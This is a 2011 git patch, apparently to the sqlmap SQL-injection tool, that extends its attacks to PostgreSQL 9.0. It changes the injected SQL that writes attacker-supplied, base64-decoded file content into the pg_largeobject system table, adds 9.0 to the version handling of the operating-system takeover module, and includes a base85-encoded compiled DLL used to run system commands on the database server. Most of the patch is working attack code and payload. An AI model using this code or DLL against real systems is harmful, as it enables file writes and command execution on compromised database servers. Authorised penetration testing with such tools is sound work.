From fdbd8bfe37109cfd5dfc2cb1ab15ef27379215ec Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 11 Apr 2011 22:02:00 +0000 Subject: [PATCH] initial support for PostgreSQL 9.0 - #223 --- plugins/dbms/postgresql/filesystem.py | 13 ++++++++++++- plugins/dbms/postgresql/takeover.py | 4 +++- .../windows/32/9.0/lib_postgresqludf_sys.dll | Bin 0 -> 5632 bytes 3 files changed, 15 insertions(+), 2 deletions(-) create mode 100644 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py index b8d01f8af..412c4cb66 100644 --- a/plugins/dbms/postgresql/filesystem.py +++ b/plugins/dbms/postgresql/filesystem.py @@ -10,6 +10,7 @@ See the file 'doc/COPYING' for copying permission import os from lib.core.common import randomInt +from lib.core.data import kb from lib.core.data import logger from lib.core.exception import sqlmapUnsupportedFeatureException from lib.request import inject @@ -97,7 +98,17 @@ class Filesystem(GenericFilesystem): # # As a matter of facts it was possible to store correctly a file # large 13776 bytes, the problem arises at next step (lo_export()) - inject.goStacked("UPDATE pg_largeobject SET data=(DECODE((SELECT %s FROM %s), 'base64')) WHERE loid=%d" % (self.tblField, self.fileTblName, self.oid)) + # + # Inject manually into PostgreSQL system table pg_largeobject the + # base64-decoded file content. Note that PostgreSQL >= 9.0 does + # not accept UPDATE into that table for some reason. + self.getVersionFromBanner() + banVer = kb.bannerFp["dbmsVersion"] + + if banVer >= "9.0": + inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, 0, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.tblField, self.fileTblName)) + else: + inject.goStacked("UPDATE pg_largeobject SET data=(DECODE((SELECT %s FROM %s), 'base64')) WHERE loid=%d" % (self.tblField, self.fileTblName, self.oid)) debugMsg = "exporting the OID %s file content to " % fileType debugMsg += "file '%s'" % dFile diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py index 7d22388de..12a5ff91d 100644 --- a/plugins/dbms/postgresql/takeover.py +++ b/plugins/dbms/postgresql/takeover.py @@ -45,7 +45,9 @@ class Takeover(GenericTakeover): banVer = kb.bannerFp["dbmsVersion"] - if banVer >= "8.4": + if banVer >= "9.0": + majorVer = "9.0" + elif banVer >= "8.4": majorVer = "8.4" elif banVer >= "8.3": majorVer = "8.3" diff --git a/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll new file mode 100644 index 0000000000000000000000000000000000000000..5df72e78a7908fd7c902776d5712fff37ad4367e GIT binary patch literal 5632 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 P5B(&3cerg2|2_Q++E^&v literal 0 HcmV?d00001